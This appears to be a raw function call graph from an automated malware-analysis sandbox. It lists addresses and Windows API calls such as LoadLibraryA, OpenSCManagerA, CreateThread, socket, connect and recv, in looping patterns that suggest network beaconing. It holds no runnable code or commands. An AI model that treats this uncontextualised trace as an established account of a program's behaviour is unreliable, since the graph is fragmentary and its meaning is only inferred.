59950 7ffe1150c462 59948->59950 59957 7ffe1150c3eb 59948->59957 59951 7ffe1150c425 59949->59951 59953 7ffe11501292 6 API calls 59950->59953 59959 7ffe11501292 6 API calls 59951->59959 59952->59951 59953->59951 59954 7ffe1150c4cc 59954->59951 59956 7ffe1150c4d3 59954->59956 59955 7ffe1150c4a1 strcmp 59955->59957 59957->59954 59957->59955 59960 7ffe1150c4e9 59959->59960 59960->59942 59979 7ffe115044db 59978->59979 59980 7ffe115044b2 LoadLibraryA 59978->59980 59982 7ffe115044de GetLastError 59979->59982 59981 7ffe115044c0 59980->59981 59980->59982 59983 7ffe11501292 6 API calls 59981->59983 59984 7ffe11501292 6 API calls 59982->59984 59985 7ffe115044d9 59983->59985 59984->59985 60124 7ffe0ec031aa 60123->60124 60125 7ffe0ec032d0 GetLastError 60123->60125 60228 7ffe0ec01e40 GetModuleHandleExA 60124->60228 60126 7ffe0ec02fd2 6 API calls 60125->60126 60128 7ffe0ec032a9 60126->60128 60133 7ffe0ec02fd2 6 API calls 60128->60133 60132 7ffe0ec031e4 strlen 60134 7ffe0ec031fd 60132->60134 60135 7ffe0ec03213 60132->60135 60138 7ffe0ec032c6 60133->60138 60134->60135 60139 7ffe0ec03202 strlen 60134->60139 60136 7ffe0ec03238 strlen fopen 60135->60136 60137 7ffe0ec03218 strcat strlen 60135->60137 60140 7ffe0ec0339d 60136->60140 60141 7ffe0ec03287 60136->60141 60137->60136 60138->59726 60147 7ffe0ec08ab4 60138->60147 60139->60135 60143 7ffe0ec02fd2 6 API calls 60140->60143 60245 7ffe0ec02fd2 60141->60245 60143->60128 60148 7ffe0ec08ad6 60147->60148 60149 7ffe0ec08b19 60147->60149 60265 7ffe0ec08720 60148->60265 60151 7ffe0ec02fd2 6 API calls 60149->60151 60154 7ffe0ec03501 60151->60154 60153 7ffe0ec08b49 _errno _strtoui64 _errno 60153->60154 60155 7ffe0ec08b7c _errno 60153->60155 60154->59731 60157 7ffe0ec04430 60154->60157 60156 7ffe0ec02fd2 6 API calls 60155->60156 60156->60154 60307 7ffe0ec02174 60157->60307 60171 7ffe0ec044cd 60193 7ffe0ec02f3a 60192->60193 60194 7ffe0ec02f62 60192->60194 60196 7ffe0ec02fd2 6 API calls 60193->60196 60195 7ffe0ec02fd2 6 API calls 60194->60195 60197 7ffe0ec02f7b 60195->60197 60198 7ffe0ec02f54 60196->60198 60199 7ffe0ec02fd2 6 API calls 60197->60199 60198->59727 60199->60198 60201 7ffe0ec03b46 CreateThread 60200->60201 60202 7ffe0ec03bc4 GetLastError 60200->60202 60203 7ffe0ec03c9c GetLastError 60201->60203 60207 7ffe0ec03b92 60201->60207 60204 7ffe0ec02fd2 6 API calls 60202->60204 60205 7ffe0ec02fd2 6 API calls 60203->60205 60211 7ffe0ec03b9f 60204->60211 60205->60207 60206 7ffe0ec03d95 60207->60206 60207->60211 60229 7ffe0ec01e68 60228->60229 60230 7ffe0ec01e72 GetLastError 60228->60230 60232 7ffe0ec07dd1 60229->60232 60231 7ffe0ec02fd2 6 API calls 60230->60231 60231->60229 60233 7ffe0ec07e18 60232->60233 60234 7ffe0ec07de2 60232->60234 60235 7ffe0ec02fd2 6 API calls 60233->60235 60236 7ffe0ec07e48 60234->60236 60237 7ffe0ec07de7 60234->60237 60243 7ffe0ec031da 60235->60243 60238 7ffe0ec02fd2 6 API calls 60236->60238 60239 7ffe0ec07e78 60237->60239 60240 7ffe0ec07df0 60237->60240 60238->60243 60241 7ffe0ec02fd2 6 API calls 60239->60241 60256 7ffe0ec07c92 8 API calls 60240->60256 60241->60243 60243->60128 60243->60132 60244 7ffe0ec07df5 60244->60243 60246 7ffe0ec02fe0 60245->60246 60257 7ffe0ec0d190 60246->60257 60256->60244 60258 7ffe0ec0d19e 60257->60258 60259 7ffe0ec0d1b5 60257->60259 60266 7ffe0ec08731 60265->60266 60267 7ffe0ec08769 60265->60267 60273 7ffe0ec08409 60266->60273 60269 7ffe0ec02fd2 6 API calls 60267->60269 60270 7ffe0ec08748 60269->60270 60270->60153 60270->60154 60274 7ffe0ec08421 60273->60274 60275 7ffe0ec0843c 60273->60275 60276 7ffe0ec0846f 60274->60276 60277 7ffe0ec08426 60274->60277 60278 7ffe0ec02fd2 6 API calls 60275->60278 60280 7ffe0ec02fd2 6 API calls 60276->60280 60279 7ffe0ec084a2 60277->60279 60282 7ffe0ec0842b 60277->60282 60286 7ffe0ec08465 60278->60286 60281 7ffe0ec02fd2 6 API calls 60279->60281 60280->60286 60281->60286 60283 7ffe0ec0850c 60282->60283 60284 7ffe0ec084e1 strcmp 60282->60284 60285 7ffe0ec08513 60283->60285 60283->60286 60284->60282 60287 7ffe0ec02fd2 6 API calls 60286->60287 60289 7ffe0ec08529 60287->60289 60289->60270 60290 7ffe0ec08590 60289->60290 60308 7ffe0ec021ab 60307->60308 60309 7ffe0ec02182 LoadLibraryA 60307->60309 60311 7ffe0ec021ae GetLastError 60308->60311 60310 7ffe0ec02190 60309->60310 60309->60311 60312 7ffe0ec02fd2 6 API calls 60310->60312 60313 7ffe0ec02fd2 6 API calls 60311->60313 60314 7ffe0ec021a9 60312->60314 60313->60314 60314->60171 60315 7ffe0ec020f3 60314->60315 60351 7ffe0ebd146a 60350->60351 60352 7ffe0ebd1590 GetLastError 60350->60352 60353 7ffe0ebd9cc0 8 API calls 60351->60353 60354 7ffe0ebd1292 6 API calls 60352->60354 60355 7ffe0ebd1486 60353->60355 60356 7ffe0ebd1569 60354->60356 60357 7ffe0ebd6dd1 8 API calls 60355->60357 60362 7ffe0ebd1292 6 API calls 60356->60362 60358 7ffe0ebd149a 60357->60358 60358->60356 60359 7ffe0ebd14a4 strlen 60358->60359 60360 7ffe0ebd14bd 60359->60360 60361 7ffe0ebd14d3 60359->60361 60360->60361 60363 7ffe0ebd14c2 strlen 60360->60363 60364 7ffe0ebd14f8 strlen fopen 60361->60364 60365 7ffe0ebd14d8 strcat strlen 60361->60365 60373 7ffe0ebd1586 60362->60373 60363->60361 60366 7ffe0ebd165d 60364->60366 60367 7ffe0ebd1547 60364->60367 60365->60364 60368 7ffe0ebd1292 6 API calls 60366->60368 60369 7ffe0ebd1292 6 API calls 60367->60369 60368->60356 60370 7ffe0ebd1561 60369->60370 60370->60356 60371 7ffe0ebd16cd 60370->60371 60372 7ffe0ebd1292 6 API calls 60371->60372 60372->60373 60373->59735 60374 7ffe0ebd7ab4 60373->60374 60375 7ffe0ebd7ad6 60374->60375 60376 7ffe0ebd7b19 60374->60376 60455 7ffe0ebd7720 60375->60455 60377 7ffe0ebd1292 6 API calls 60376->60377 60380 7ffe0ebd7aef 60377->60380 60380->59744 60384 7ffe0ebd3420 60380->60384 60381 7ffe0ebd7b49 _errno _strtoui64 _errno 60381->60380 60382 7ffe0ebd7b7c _errno 60381->60382 60383 7ffe0ebd1292 6 API calls 60382->60383 60383->60380 60497 7ffe0ebd9ff4 60384->60497 60420 7ffe0ebd2dfa 60419->60420 60421 7ffe0ebd2e22 60419->60421 60422 7ffe0ebd1292 6 API calls 60420->60422 60423 7ffe0ebd1292 6 API calls 60421->60423 60426 7ffe0ebd2e14 60422->60426 60424 7ffe0ebd2e3b 60423->60424 60425 7ffe0ebd1292 6 API calls 60424->60425 60425->60426 60426->59744 60427 7ffe0ebd1d21 InitializeCriticalSectionAndSpinCount 60426->60427 60428 7ffe0ebd1d46 CreateThread 60427->60428 60429 7ffe0ebd1dc4 GetLastError 60427->60429 60430 7ffe0ebd1e9c GetLastError 60428->60430 60437 7ffe0ebd1d92 60428->60437 60431 7ffe0ebd1292 6 API calls 60429->60431 60434 7ffe0ebd1292 6 API calls 60430->60434 60433 7ffe0ebd1d9f 60431->60433 60432 7ffe0ebd1f95 60435 7ffe0ebd1292 6 API calls 60432->60435 60436 7ffe0ebd1292 6 API calls 60433->60436 60434->60437 60438 7ffe0ebd1dbc 60435->60438 60436->60438 60437->60432 60437->60433 60438->59744 60456 7ffe0ebd7769 60455->60456 60457 7ffe0ebd7731 60455->60457 60459 7ffe0ebd1292 6 API calls 60456->60459 60463 7ffe0ebd7409 60457->60463 60461 7ffe0ebd7748 60459->60461 60461->60380 60461->60381 60464 7ffe0ebd743c 60463->60464 60465 7ffe0ebd7421 60463->60465 60468 7ffe0ebd1292 6 API calls 60464->60468 60466 7ffe0ebd7426 60465->60466 60467 7ffe0ebd746f 60465->60467 60469 7ffe0ebd74a2 60466->60469 60476 7ffe0ebd742b 60466->60476 60470 7ffe0ebd1292 6 API calls 60467->60470 60475 7ffe0ebd7465 60468->60475 60471 7ffe0ebd1292 6 API calls 60469->60471 60470->60475 60471->60475 60472 7ffe0ebd750c 60474 7ffe0ebd7513 60472->60474 60472->60475 60473 7ffe0ebd74e1 strcmp 60473->60476 60478 7ffe0ebd1292 6 API calls 60475->60478 60476->60472 60476->60473 60479 7ffe0ebd7529 60478->60479 60479->60461 60498 7ffe0ebda02b 60497->60498 60499 7ffe0ebda002 LoadLibraryA 60497->60499 60500 7ffe0ebda02e GetLastError 60498->60500 60499->60500 60501 7ffe0ebda010 60499->60501 60503 7ffe0ebd1292 6 API calls 60500->60503 60502 7ffe0ebd1292 6 API calls 60501->60502 60504 7ffe0ebd3434 60502->60504 60503->60504 60541 7ffe1330a500 GetLastError 60540->60541 60542 7ffe1330a3da 60540->60542 60544 7ffe1330a202 12 API calls 60541->60544 60648 7ffe13307140 GetModuleHandleExA 60542->60648 60560 7ffe1330a4d9 60544->60560 60548 7ffe1330a414 strlen 60550 7ffe1330a443 60548->60550 60551 7ffe1330a42d 60548->60551 60549 7ffe1330a202 12 API calls 60552 7ffe1330a4f6 60549->60552 60554 7ffe1330a468 strlen fopen 60550->60554 60555 7ffe1330a448 strcat strlen 60550->60555 60551->60550 60553 7ffe1330a432 strlen 60551->60553 60552->59748 60564 7ffe133094f4 60552->60564 60553->60550 60556 7ffe1330a4b7 60554->60556 60557 7ffe1330a5cd 60554->60557 60555->60554 60665 7ffe1330a202 60556->60665 60558 7ffe1330a202 12 API calls 60557->60558 60558->60560 60560->60549 60565 7ffe13309516 60564->60565 60566 7ffe13309559 60564->60566 60685 7ffe13309160 60565->60685 60568 7ffe1330a202 12 API calls 60566->60568 60570 7ffe1330952f 60568->60570 60570->59750 60574 7ffe13302610 60570->60574 60571 7ffe13309589 _errno _strtoui64 _errno 60571->60570 60572 7ffe133095bc _errno 60571->60572 60573 7ffe1330a202 12 API calls 60572->60573 60573->60570 60727 7ffe13307474 60574->60727 60610 7ffe13301fea 60609->60610 60611 7ffe13302012 60609->60611 60612 7ffe1330a202 12 API calls 60610->60612 60613 7ffe1330a202 12 API calls 60611->60613 60615 7ffe13302004 60612->60615 60614 7ffe1330202b 60613->60614 60616 7ffe1330a202 12 API calls 60614->60616 60615->59754 60616->60615 60618 7ffe13306aec GetLastError 60617->60618 60619 7ffe1330696a InitializeCriticalSectionAndSpinCount 60617->60619 60622 7ffe1330a202 12 API calls 60618->60622 60620 7ffe13306c08 GetLastError 60619->60620 60621 7ffe13306997 60619->60621 60624 7ffe1330a202 12 API calls 60620->60624 60623 7ffe133069ad CreateThread 60621->60623 60628 7ffe13306c26 60621->60628 60634 7ffe13306b0a 60622->60634 60624->60628 60634->60620 60649 7ffe13307168 60648->60649 60650 7ffe13307172 GetLastError 60648->60650 60652 7ffe13305fb1 60649->60652 60651 7ffe1330a202 12 API calls 60650->60651 60651->60649 60653 7ffe13305ff8 60652->60653 60654 7ffe13305fc2 60652->60654 60657 7ffe1330a202 12 API calls 60653->60657 60655 7ffe13306028 60654->60655 60656 7ffe13305fc7 60654->60656 60658 7ffe1330a202 12 API calls 60655->60658 60659 7ffe13306058 60656->60659 60660 7ffe13305fd0 60656->60660 60661 7ffe13305fdd 60657->60661 60658->60661 60662 7ffe1330a202 12 API calls 60659->60662 60676 7ffe13305e72 14 API calls 60660->60676 60661->60548 60661->60560 60662->60661 60664 7ffe13305fd5 60664->60661 60666 7ffe1330a210 60665->60666 60677 7ffe1330b210 60666->60677 60676->60664 60678 7ffe1330b21e 60677->60678 60679 7ffe1330b235 60677->60679 60683 7ffe1330c24b 7 API calls 60678->60683 60684 7ffe1330c24b 7 API calls 60679->60684 60686 7ffe13309171 60685->60686 60687 7ffe133091a9 60685->60687 60693 7ffe13308e49 60686->60693 60689 7ffe1330a202 12 API calls 60687->60689 60691 7ffe13309188 60689->60691 60691->60570 60691->60571 60694 7ffe13308e61 60693->60694 60695 7ffe13308e7c 60693->60695 60696 7ffe13308eaf 60694->60696 60697 7ffe13308e66 60694->60697 60698 7ffe1330a202 12 API calls 60695->60698 60699 7ffe1330a202 12 API calls 60696->60699 60700 7ffe13308ee2 60697->60700 60707 7ffe13308e6b 60697->60707 60703 7ffe13308ea5 60698->60703 60699->60703 60701 7ffe1330a202 12 API calls 60700->60701 60701->60703 60702 7ffe13308f4c 60702->60703 60705 7ffe13308f53 60702->60705 60706 7ffe1330a202 12 API calls 60703->60706 60704 7ffe13308f21 strcmp 60704->60707 60708 7ffe1330a202 12 API calls 60705->60708 60709 7ffe13308f69 60706->60709 60707->60702 60707->60704 60708->60709 60709->60691 60728 7ffe133074ab 60727->60728 60729 7ffe13307482 LoadLibraryA 60727->60729 60730 7ffe133074ae GetLastError 60728->60730 60729->60730 60731 7ffe13307490 60729->60731 60732 7ffe1330a202 12 API calls 60730->60732 60733 7ffe1330a202 12 API calls 60731->60733 60734 7ffe13302624 60732->60734 60733->60734 60771 7ffe0e161590 GetLastError 60770->60771 60772 7ffe0e16146a 60770->60772 60773 7ffe0e161292 6 API calls 60771->60773 60883 7ffe0e16cc60 GetModuleHandleExA 60772->60883 60786 7ffe0e161569 60773->60786 60778 7ffe0e1614a4 strlen 60780 7ffe0e1614d3 60778->60780 60781 7ffe0e1614bd 60778->60781 60779 7ffe0e161292 6 API calls 60785 7ffe0e161586 60779->60785 60783 7ffe0e1614f8 strlen fopen 60780->60783 60784 7ffe0e1614d8 strcat strlen 60780->60784 60781->60780 60782 7ffe0e1614c2 strlen 60781->60782 60782->60780 60787 7ffe0e16165d 60783->60787 60788 7ffe0e161547 60783->60788 60784->60783 60785->59759 60794 7ffe0e16c974 60785->60794 60786->60779 60790 7ffe0e161292 6 API calls 60787->60790 60900 7ffe0e161292 60788->60900 60790->60786 60795 7ffe0e16c9d9 60794->60795 60796 7ffe0e16c996 60794->60796 60797 7ffe0e161292 6 API calls 60795->60797 60920 7ffe0e16c5e0 60796->60920 60800 7ffe0e16be11 60797->60800 60800->59760 60804 7ffe0e169770 60800->60804 60801 7ffe0e16ca09 _errno _strtoui64 _errno 60801->60800 60802 7ffe0e16ca3c _errno 60801->60802 60803 7ffe0e161292 6 API calls 60802->60803 60803->60800 60962 7ffe0e16cf94 60804->60962 60840 7ffe0e162e22 60839->60840 60841 7ffe0e162dfa 60839->60841 60842 7ffe0e161292 6 API calls 60840->60842 60843 7ffe0e161292 6 API calls 60841->60843 60844 7ffe0e162e3b 60842->60844 60845 7ffe0e162e14 60843->60845 60846 7ffe0e161292 6 API calls 60844->60846 60845->59760 60847 7ffe0e165a84 InitializeCriticalSectionAndSpinCount 60845->60847 60846->60845 60848 7ffe0e165ad4 GetLastError 60847->60848 60849 7ffe0e165a9f 60847->60849 60850 7ffe0e161292 6 API calls 60848->60850 60851 7ffe0e161292 6 API calls 60849->60851 60853 7ffe0e165af2 60850->60853 60852 7ffe0e165ac7 60851->60852 60852->59760 60855 7ffe0e161d21 InitializeCriticalSectionAndSpinCount 60852->60855 60854 7ffe0e161292 6 API calls 60853->60854 60854->60852 60884 7ffe0e16cc92 GetLastError 60883->60884 60885 7ffe0e161486 60883->60885 60886 7ffe0e161292 6 API calls 60884->60886 60887 7ffe0e168ff1 60885->60887 60886->60885 60888 7ffe0e169002 60887->60888 60889 7ffe0e169038 60887->60889 60891 7ffe0e169068 60888->60891 60892 7ffe0e169007 60888->60892 60890 7ffe0e161292 6 API calls 60889->60890 60898 7ffe0e16149a 60890->60898 60893 7ffe0e161292 6 API calls 60891->60893 60894 7ffe0e169010 60892->60894 60895 7ffe0e169098 60892->60895 60893->60898 60911 7ffe0e168eb2 8 API calls 60894->60911 60896 7ffe0e161292 6 API calls 60895->60896 60896->60898 60898->60778 60898->60786 60899 7ffe0e169015 60899->60898 60901 7ffe0e1612a0 60900->60901 60912 7ffe0e16f010 60901->60912 60911->60899 60913 7ffe0e16f035 60912->60913 60914 7ffe0e16f01e 60912->60914 60921 7ffe0e16c5f1 60920->60921 60922 7ffe0e16c629 60920->60922 60928 7ffe0e16c2c9 60921->60928 60924 7ffe0e161292 6 API calls 60922->60924 60926 7ffe0e16c608 60924->60926 60926->60800 60926->60801 60929 7ffe0e16c2e1 60928->60929 60930 7ffe0e16c2fc 60928->60930 60931 7ffe0e16c32f 60929->60931 60932 7ffe0e16c2e6 60929->60932 60933 7ffe0e161292 6 API calls 60930->60933 60935 7ffe0e161292 6 API calls 60931->60935 60934 7ffe0e16c362 60932->60934 60942 7ffe0e16c2eb 60932->60942 60940 7ffe0e16c325 60933->60940 60936 7ffe0e161292 6 API calls 60934->60936 60935->60940 60936->60940 60937 7ffe0e16c3cc 60939 7ffe0e16c3d3 60937->60939 60937->60940 60938 7ffe0e16c3a1 strcmp 60938->60942 60943 7ffe0e161292 6 API calls 60939->60943 60941 7ffe0e161292 6 API calls 60940->60941 60944 7ffe0e16c3e9 60941->60944 60942->60937 60942->60938 60943->60944 60944->60926 60945 7ffe0e16c450 60944->60945 60963 7ffe0e16cfa2 LoadLibraryA 60962->60963 60964 7ffe0e16cfcb 60962->60964 60965 7ffe0e16cfb0 60963->60965 60966 7ffe0e16cfce GetLastError 60963->60966 60964->60966 60967 7ffe0e161292 6 API calls 60965->60967 60968 7ffe0e161292 6 API calls 60966->60968 60969 7ffe0e169784 60967->60969 60968->60969 61006 7ffe0eb41590 GetLastError 61005->61006 61007 7ffe0eb4146a 61005->61007 61009 7ffe0eb41292 6 API calls 61006->61009 61130 7ffe0eb41770 GetModuleHandleExA 61007->61130 61011 7ffe0eb41569 61009->61011 61017 7ffe0eb41292 6 API calls 61011->61017 61014 7ffe0eb414a4 strlen 61015 7ffe0eb414d3 61014->61015 61016 7ffe0eb414bd 61014->61016 61019 7ffe0eb414f8 strlen fopen 61015->61019 61020 7ffe0eb414d8 strcat strlen 61015->61020 61016->61015 61018 7ffe0eb414c2 strlen 61016->61018 61021 7ffe0eb41586 61017->61021 61018->61015 61022 7ffe0eb41547 61019->61022 61023 7ffe0eb4165d 61019->61023 61020->61019 61021->59774 61029 7ffe0eb49004 61021->61029 61147 7ffe0eb41292 61022->61147 61024 7ffe0eb41292 6 API calls 61023->61024 61024->61011 61030 7ffe0eb49026 61029->61030 61031 7ffe0eb49069 61029->61031 61167 7ffe0eb48c70 61030->61167 61033 7ffe0eb41292 6 API calls 61031->61033 61035 7ffe0eb48491 61033->61035 61035->59775 61039 7ffe0eb4e870 61035->61039 61036 7ffe0eb49099 _errno _strtoui64 _errno 61036->61035 61037 7ffe0eb490cc _errno 61036->61037 61038 7ffe0eb41292 6 API calls 61037->61038 61038->61035 61209 7ffe0eb41aa4 61039->61209 61053 7ffe0eb4e90d 61075 7ffe0eb44a42 GetLastError 61074->61075 61076 7ffe0eb449da OpenSCManagerA 61074->61076 61079 7ffe0eb41292 6 API calls 61075->61079 61077 7ffe0eb44a10 61076->61077 61078 7ffe0eb44b1a GetLastError 61076->61078 61080 7ffe0eb44b36 61077->61080 61081 7ffe0eb44a1d 61077->61081 61082 7ffe0eb41292 6 API calls 61078->61082 61079->61081 61084 7ffe0eb41292 6 API calls 61080->61084 61083 7ffe0eb41292 6 API calls 61081->61083 61082->61080 61085 7ffe0eb44a3a 61083->61085 61084->61085 61085->59775 61086 7ffe0eb4595e WSAStartup 61085->61086 61087 7ffe0eb459a2 61086->61087 61088 7ffe0eb4597a 61086->61088 61090 7ffe0eb41292 6 API calls 61087->61090 61089 7ffe0eb41292 6 API calls 61088->61089 61131 7ffe0eb417a2 GetLastError 61130->61131 61132 7ffe0eb41486 61130->61132 61133 7ffe0eb41292 6 API calls 61131->61133 61134 7ffe0eb4e0f1 61132->61134 61133->61132 61135 7ffe0eb4e102 61134->61135 61136 7ffe0eb4e138 61134->61136 61137 7ffe0eb4e107 61135->61137 61138 7ffe0eb4e168 61135->61138 61139 7ffe0eb41292 6 API calls 61136->61139 61141 7ffe0eb4e110 61137->61141 61142 7ffe0eb4e198 61137->61142 61140 7ffe0eb41292 6 API calls 61138->61140 61145 7ffe0eb4149a 61139->61145 61140->61145 61158 7ffe0eb4dfb2 8 API calls 61141->61158 61143 7ffe0eb41292 6 API calls 61142->61143 61143->61145 61145->61011 61145->61014 61146 7ffe0eb4e115 61146->61145 61148 7ffe0eb412a0 61147->61148 61159 7ffe0eb50c10 61148->61159 61158->61146 61160 7ffe0eb50c35 61159->61160 61161 7ffe0eb50c1e 61159->61161 61168 7ffe0eb48c81 61167->61168 61169 7ffe0eb48cb9 61167->61169 61175 7ffe0eb48959 61168->61175 61171 7ffe0eb41292 6 API calls 61169->61171 61174 7ffe0eb48c98 61171->61174 61174->61035 61174->61036 61176 7ffe0eb48971 61175->61176 61177 7ffe0eb4898c 61175->61177 61179 7ffe0eb489bf 61176->61179 61180 7ffe0eb48976 61176->61180 61178 7ffe0eb41292 6 API calls 61177->61178 61187 7ffe0eb489b5 61178->61187 61182 7ffe0eb41292 6 API calls 61179->61182 61181 7ffe0eb489f2 61180->61181 61183 7ffe0eb4897b 61180->61183 61184 7ffe0eb41292 6 API calls 61181->61184 61182->61187 61185 7ffe0eb48a5c 61183->61185 61188 7ffe0eb48a31 strcmp 61183->61188 61184->61187 61186 7ffe0eb48a63 61185->61186 61185->61187 61189 7ffe0eb41292 6 API calls 61186->61189 61190 7ffe0eb41292 6 API calls 61187->61190 61188->61183 61191 7ffe0eb48a79 61189->61191 61190->61191 61191->61174 61192 7ffe0eb48ae0 61191->61192 61210 7ffe0eb41ab2 LoadLibraryA 61209->61210 61211 7ffe0eb41adb 61209->61211 61212 7ffe0eb41ac0 61210->61212 61213 7ffe0eb41ade GetLastError 61210->61213 61211->61213 61214 7ffe0eb41292 6 API calls 61212->61214 61215 7ffe0eb41292 6 API calls 61213->61215 61216 7ffe0eb41ad9 61214->61216 61215->61216 61216->61053 61217 7ffe0eb41a23 61216->61217 61253 7ff6bfd6ab35 61252->61253 61254 7ff6bfd6ab1e 61252->61254 61259 7ff6bfd6bb4b fputc 61253->61259 61258 7ff6bfd6bb4b fputc 61254->61258 61257 7ff6bfd69a49 61257->59262 61257->59263 61257->59264 61258->61257 61259->61257 61260 7ffe0ec0364a 61269 7ffe0ec03655 61260->61269 61261 7ffe0ec0375e 61265 7ffe0ec0376b 61261->61265 61319 7ffe0ec02415 10 API calls 61261->61319 61264 7ffe0ec0367d Sleep 61264->61269 61267 7ffe0ec03732 Sleep 61267->61269 61268 7ffe0ec02415 10 API calls 61268->61269 61269->61261 61269->61264 61269->61267 61269->61268 61271 7ffe0ec0371e memcpy 61269->61271 61272 7ffe0ec026ac socket 61269->61272 61307 7ffe0ec02b5a 61269->61307 61318 7ffe0ec03580 9 API calls 61269->61318 61271->61269 61273 7ffe0ec028ab WSAGetLastError 61272->61273 61274 7ffe0ec026e3 61272->61274 61277 7ffe0ec02fd2 6 API calls 61273->61277 61275 7ffe0ec026e7 61274->61275 61276 7ffe0ec02705 61274->61276 61320 7ffe0ec02349 61275->61320 61280 7ffe0ec02349 8 API calls 61276->61280 61279 7ffe0ec028cf 61277->61279 61282 7ffe0ec028d9 61279->61282 61283 7ffe0ec0271f 61279->61283 61284 7ffe0ec02703 61280->61284 61288 7ffe0ec02fd2 6 API calls 61282->61288 61286 7ffe0ec02fd2 6 API calls 61283->61286 61285 7ffe0ec02717 61284->61285 61333 7ffe0ec0247a setsockopt 61284->61333 61337 7ffe0ec02415 10 API calls 61285->61337 61289 7ffe0ec02740 61286->61289 61287 7ffe0ec0275e 61287->61285 61292 7ffe0ec02763 htonl htons connect 61287->61292 61288->61289 61289->61269 61294 7ffe0ec027bc WSAGetLastError 61292->61294 61295 7ffe0ec027a1 61292->61295 61297 7ffe0ec027cd 61294->61297 61298 7ffe0ec0287e WSAGetLastError 61294->61298 61296 7ffe0ec02349 8 API calls 61295->61296 61301 7ffe0ec027ae 61296->61301 61297->61285 61299 7ffe0ec027d5 select 61297->61299 61300 7ffe0ec02fd2 6 API calls 61298->61300 61302 7ffe0ec02836 61299->61302 61303 7ffe0ec02860 61299->61303 61300->61285 61301->61279 61301->61285 61302->61295 61304 7ffe0ec0283c WSAGetLastError 61302->61304 61305 7ffe0ec02fd2 6 API calls 61303->61305 61306 7ffe0ec02fd2 6 API calls 61304->61306 61305->61285 61306->61285 61308 7ffe0ec02be8 61307->61308 61309 7ffe0ec02b74 61307->61309 61310 7ffe0ec02fd2 6 API calls 61308->61310 61309->61308 61311 7ffe0ec02b79 recv 61309->61311 61314 7ffe0ec02b93 61310->61314 61312 7ffe0ec02b9c WSAGetLastError 61311->61312 61313 7ffe0ec02b8f 61311->61313 61312->61314 61315 7ffe0ec02bb0 61312->61315 61313->61314 61317 7ffe0ec02fd2 6 API calls 61313->61317 61314->61269 61316 7ffe0ec02fd2 6 API calls 61315->61316 61316->61314 61317->61314 61318->61269 61319->61265 61321 7ffe0ec02359 ioctlsocket 61320->61321 61323 7ffe0ec0238d WSAGetLastError 61321->61323 61324 7ffe0ec0237c 61321->61324 61325 7ffe0ec02fd2 6 API calls 61323->61325 61324->61287 61326 7ffe0ec02294 setsockopt 61324->61326 61325->61324 61327 7ffe0ec022c9 setsockopt 61326->61327 61328 7ffe0ec02324 WSAGetLastError 61326->61328 61329 7ffe0ec022f5 61327->61329 61330 7ffe0ec022ff WSAGetLastError 61327->61330 61331 7ffe0ec02fd2 6 API calls 61328->61331 61329->61284 61332 7ffe0ec02fd2 6 API calls 61330->61332 61331->61329 61332->61329 61334 7ffe0ec024b7 61333->61334 61335 7ffe0ec024c1 WSAGetLastError 61333->61335 61334->61287 61336 7ffe0ec02fd2 6 API calls 61335->61336 61336->61334 61337->61283 61338 7ffe0eb4ef2a 61339 7ffe0eb4ef35 61338->61339 61340 7ffe0eb4f03e 61339->61340 61341 7ffe0eb4ef5d Sleep 61339->61341 61345 7ffe0eb44e55 10 API calls 61339->61345 61347 7ffe0eb4f012 Sleep 61339->61347 61349 7ffe0eb4effe memcpy 61339->61349 61350 7ffe0eb450ec socket 61339->61350 61385 7ffe0eb4559a 61339->61385 61396 7ffe0eb4ee60 61339->61396 61344 7ffe0eb4f04b 61340->61344 61405 7ffe0eb44e55 10 API calls 61340->61405 61341->61339 61345->61339 61347->61339 61349->61339 61351 7ffe0eb45123 61350->61351 61352 7ffe0eb452eb WSAGetLastError 61350->61352 61353 7ffe0eb45145 61351->61353 61354 7ffe0eb45127 61351->61354 61355 7ffe0eb41292 6 API calls 61352->61355 61358 7ffe0eb44d89 8 API calls 61353->61358 61406 7ffe0eb44d89 61354->61406 61357 7ffe0eb4530f 61355->61357 61360 7ffe0eb45319 61357->61360 61371 7ffe0eb4515f 61357->61371 61364 7ffe0eb45143 61358->61364 61363 7ffe0eb41292 6 API calls 61360->61363 61361 7ffe0eb41292 6 API calls 61367 7ffe0eb45180 61361->61367 61362 7ffe0eb4519e 61365 7ffe0eb45157 61362->61365 61369 7ffe0eb451a3 htonl htons connect 61362->61369 61363->61367 61364->61365 61419 7ffe0eb44eba setsockopt 61364->61419 61423 7ffe0eb44e55 10 API calls 61365->61423 61367->61339 61372 7ffe0eb451e1 61369->61372 61373 7ffe0eb451fc WSAGetLastError 61369->61373 61371->61361 61374 7ffe0eb44d89 8 API calls 61372->61374 61375 7ffe0eb452be WSAGetLastError 61373->61375 61376 7ffe0eb4520d 61373->61376 61378 7ffe0eb451ee 61374->61378 61377 7ffe0eb41292 6 API calls 61375->61377 61376->61365 61379 7ffe0eb45215 select 61376->61379 61377->61365 61378->61357 61378->61365 61380 7ffe0eb452a0 61379->61380 61381 7ffe0eb45276 61379->61381 61383 7ffe0eb41292 6 API calls 61380->61383 61381->61372 61382 7ffe0eb4527c WSAGetLastError 61381->61382 61384 7ffe0eb41292 6 API calls 61382->61384 61383->61365 61384->61365 61386 7ffe0eb455b4 61385->61386 61387 7ffe0eb45628 61385->61387 61386->61387 61389 7ffe0eb455b9 recv 61386->61389 61388 7ffe0eb41292 6 API calls 61387->61388 61390 7ffe0eb455d3 61388->61390 61391 7ffe0eb455cf 61389->61391 61392 7ffe0eb455dc WSAGetLastError 61389->61392 61390->61339 61391->61390 61395 7ffe0eb41292 6 API calls 61391->61395 61392->61390 61393 7ffe0eb455f0 61392->61393 61394 7ffe0eb41292 6 API calls 61393->61394 61394->61390 61395->61390 61397 7ffe0eb4ef22 61396->61397 61398 7ffe0eb4ee78 61396->61398 61397->61339 61398->61397 61424 7ffe0eb47cc0 61398->61424 61401 7ffe0eb4ef14 LeaveCriticalSection 61401->61397 61402 7ffe0eb4eea8 61402->61401 61403 7ffe0eb41292 6 API calls 61402->61403 61427 7ffe0eb500aa 61402->61427 61403->61402 61405->61344 61407 7ffe0eb44d99 ioctlsocket 61406->61407 61409 7ffe0eb44dcd WSAGetLastError 61407->61409 61411 7ffe0eb44dbc 61407->61411 61410 7ffe0eb41292 6 API calls 61409->61410 61410->61411 61411->61362 61412 7ffe0eb44cd4 setsockopt 61411->61412 61413 7ffe0eb44d64 WSAGetLastError 61412->61413 61414 7ffe0eb44d09 setsockopt 61412->61414 61417 7ffe0eb41292 6 API calls 61413->61417 61415 7ffe0eb44d3f WSAGetLastError 61414->61415 61416 7ffe0eb44d35 61414->61416 61418 7ffe0eb41292 6 API calls 61415->61418 61416->61364 61417->61416 